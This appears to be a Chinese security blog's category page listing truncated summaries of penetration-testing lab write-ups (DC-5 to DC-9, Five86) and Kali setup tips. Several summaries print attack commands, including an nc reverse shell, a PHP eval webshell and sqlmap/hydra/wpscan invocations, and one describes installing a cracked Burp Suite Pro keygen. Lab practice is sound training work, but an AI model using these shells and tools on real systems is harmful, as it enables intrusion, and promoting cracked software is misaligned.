随笔分类 - 网络安全技术
渗透、信息安全、网络安全相关技术
    
摘要:渗透时用ssh登录到靶机之后,想要运行靶机中带界面的软件的话很简单。 ssh -X username@ipaddress 使用 -X参数就行了 A机器通过ssh登录到B机器,把B机器运行的某界面程序放到A机器上! 比如wireshark ok
        阅读全文
                
摘要:平时搭建这HTTP服务,就是用来传输文件的。 python -m SimpleHTTPServer 默认端口是8000,当然还可以在后面指定端口。
        阅读全文
                
摘要:上次遇到无法获取ip的靶机是Ubuntu的,现在是centos的, 为什么倒霉的总是我? 马丁 思路差不多 1.先进入单人模式 按任意键进入 按e键进入第一个CentOS 再选择kernel那一行按e键 就接着后面加上 single 然后回车 回到这里按b 2.接下来配置文件 我这情况有点复杂,没有
        阅读全文
                
摘要:日常打靶机,结果遇到这问题咋办? 网上找的解决办法没卵用。 将.ova文件解压出来2个文件一个.ovf文件一个vmdk文件 用记事本打开.ovf文件会发现: 其实可以用virtualbox,但是我不想。 改成vmx-15.5屁用没有 其实还有一个解决办法:只用vmdk文件(这办法是在google搜的
        阅读全文
                
摘要:%!xxd #编码成十六进制 %!xxd -r #将十六进制解码 %!base64 --encode #编码base64 %!base64 --decode #解码base64
        阅读全文
                
摘要:经常遇到靶机在vm下获取不到ip的情况,其实可以用VirtualBox就可以解决。 但是,我不想用VirtualBox vm下的解决办法: 在开机选择的时候,摁 e 编辑一下 把 ro 改成 rw single init=/bin/bash 然后 ctrl+x,就可以输入东西了 ip a 查看一下实
        阅读全文
                
摘要:渗透到获得shell时,得到的仅仅是个简陋的哑 shell,并非交互式 shell。基于以下几个原因,让我有强烈驱动力将哑 shell 转为交互式 shell:防止 ctrl-c 中断 getshell 会话、无法查看语法高亮、无法执行交互式命令、无法查看错误输出、无法使用 tab 命令补全、无法操
        阅读全文
                
摘要:kali里chrome有了,burpsuite也有了,但是,你会发现chrome设置burpsuite代理有点麻烦。 所以需要给chrome安装SwitchyOmega插件 1.下载SwitchyOmega wget https://github.com/FelisCatus/SwitchyOmeg
        阅读全文
                
摘要:免费的burpsuite真不好用,所以。。。 0x01 先把免费的burpsuite删了(不删也行随你) sudo apt remove burpsuite 0x02 准备好新版本的burpsuite和jdk Burp_Suite_Pro_v1.7.37_Loader_Keygen 下载连接:htt
        阅读全文
                
摘要:是不是觉得kali2020自带的firefox贼不好用,是不是,是不是? 是的 1.安装chrome首先要下载安装包 wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb 2.然后安装 dpkg 
        阅读全文
                
摘要:更新源过期了,我换源都没用,一脸懵逼。 原来是系统时间错了,我擦。 解决方法:将虚拟机时间与主机同步 sudo services ntp restart 然后等一会儿
        阅读全文
                
摘要:0x01 用vim文本编辑器打开sources.list vim /etc/apt/sources.list 0x02 添加更新源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http:
        阅读全文
                
摘要:fping -aqg 192.168.1.1/24 nmap -sS -sV -sC -p- -n -Pn -T4 -vvv -oN five86-2 192.168.1.149 wpscan --url http://five86-2 -e -u wpscan --url http://five8
        阅读全文
                
摘要:sudo arp-scan -l nmap -sS -sV -sC -p- -n -Pn -T4 -vvv -oN Five86-1 192.168.1.147 crunch 10 10 aefhrt > passsudo john --wordlist=pass 1.txt 最后总结: 1.Ope
        阅读全文
                
摘要:sudo arp-scan -l sudo nmap -sS -A -p- -n -Pn -T4 -oN DC9 192.168.1.144 sqlmap -r target.txt -random-agent --dbs hydra -L username.txt -P password.txt 
        阅读全文
                
摘要:靶机ip 192.168.1.143 nmap -sV -sC -p- -vvv -n -Pn -T4 -oN DC-8 192.168.1.143 droopescan scan drupal -u http://192.168.1.143 searchexploit drupal 7 sqlma
        阅读全文
                
摘要:fping -aqg 192.168.1.1/24 nmap -A -p- -sC -T3 -n -Pn -oN DC7 192.168.1.142 droopescan scan drupal http://192.168.1.142 在drupal官网找到了方法 https://www.drup
        阅读全文
                
摘要:fping -aqg 192.168.1.1/24 nmap -sC -A -n -p- -Pn -T5 -oN DC-6 192.168.1.141 wpscan --url http://wordy/ -e -u nc 192.168.1.131 1337 -e /bin/bash https:
        阅读全文
                
摘要:寻找靶机ip fping -aqg 192.168.1.0/24 sudo nmap -sC -A -p- -n -Pn -T4 -oN DC-5 192.168.1.137 <?php eval($_REQUEST[xxx])?> find / -user root -perm -4000 -pr
        阅读全文
                
摘要:首先寻找靶机ip netdiscover -r 192.168.1.0/24 nmap -sS -p- -n -Pn 192.168.1.136 nmap -A -p22,80 -T3 -n -Pn 192.168.1.136 sqlmap -r xxx.txt random-agent --dbs
        阅读全文
                
 
                     
                    
                 
                    
                
 
         浙公网安备 33010602011771号
浙公网安备 33010602011771号